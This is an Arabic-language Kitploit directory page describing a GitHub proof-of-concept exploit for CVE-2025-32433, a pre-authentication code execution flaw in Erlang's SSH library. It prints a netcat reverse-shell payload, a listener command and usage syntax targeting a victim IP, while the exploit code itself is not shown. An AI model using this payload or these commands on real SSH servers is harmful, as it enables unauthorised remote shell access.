Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-3243 — استغلال إثبات مفهوم لـ CVE-2025-32433، ثغرة أمنية خطيرة في مكتبة SSH الخاصة بـ Erlang تسمح بتنفيذ التعليمات البرمجية قبل المصادقة عبر حزم SSH_MSG_CHANNEL_REQUEST غير صالحة. | Kitploit
أدوات/GitHubGitHub/tenebrae93/cve-2025-3243
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقأداة الوصول عن بعد
GitHubtenebrae93/cve-2025-3243

CVE-2025-3243

استغلال إثبات مفهوم لـ CVE-2025-32433، ثغرة أمنية خطيرة في مكتبة SSH الخاصة بـ Erlang تسمح بتنفيذ التعليمات البرمجية قبل المصادقة عبر حزم SSH_MSG_CHANNEL_REQUEST غير صالحة.

عرض المستودع
71منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2025-32433 لمكتبة SSH في Erlang

استغلال إثبات المفهوم لـ CVE-2025-32433، وهي ثغرة حرجة في مكتبة SSH الخاصة بـ Erlang تسمح بتنفيذ الأوامر قبل المصادقة عبر حزم SSH_MSG_CHANNEL_REQUEST غير صالحة.


الميزات

  • الاستغلال الأصلي بواسطة Matthew Keeley
  • النسخة المحدثة بواسطة Tyler Ramsbey:
    • وسائط سطر الأوامر لـ LHOST و LPORT و RHOST و RPORT
    • مساعدة واستخدام مدمجان عبر argparse
    • حمولة reverse shell على نمط Erlang باستخدام os:cmd("nc LHOST LPORT -e /bin/sh").
    • تجزئة نظيفة للدوال وتسجيل الحالة لكل مرحلة

المتطلبات الأساسية

  • بايثون 3
  • مستمع nc (Netcat) يعمل على جهاز الهجوم الخاص بك
  • وصول شبكي لخدمة SSH المستهدفة (المنفذ الافتراضي 22)

الاستخدام

  1. ابدأ تشغيل المستمع على جهاز الهجوم:

    root@kitploit:~
    nc -lvnp 4444
    
  2. شغّل الاستغلال:

    root@kitploit:~
    python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
    
  3. انتظر حتى يتصل الصدفة مرة أخرى بمستمعك.

قائمة المساعدة

root@kitploit:~
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)

الإسناد

  • النص البرمجي الأصلي بواسطة Matthew Keeley (MattKeeley)
  • هذه النسخة المحدثة بواسطة Tyler Ramsbey

إخلاء المسؤولية

استخدم هذا الكود فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. استغلال الثغرات دون إذن غير قانوني وغير أخلاقي.

تنزيل الأداة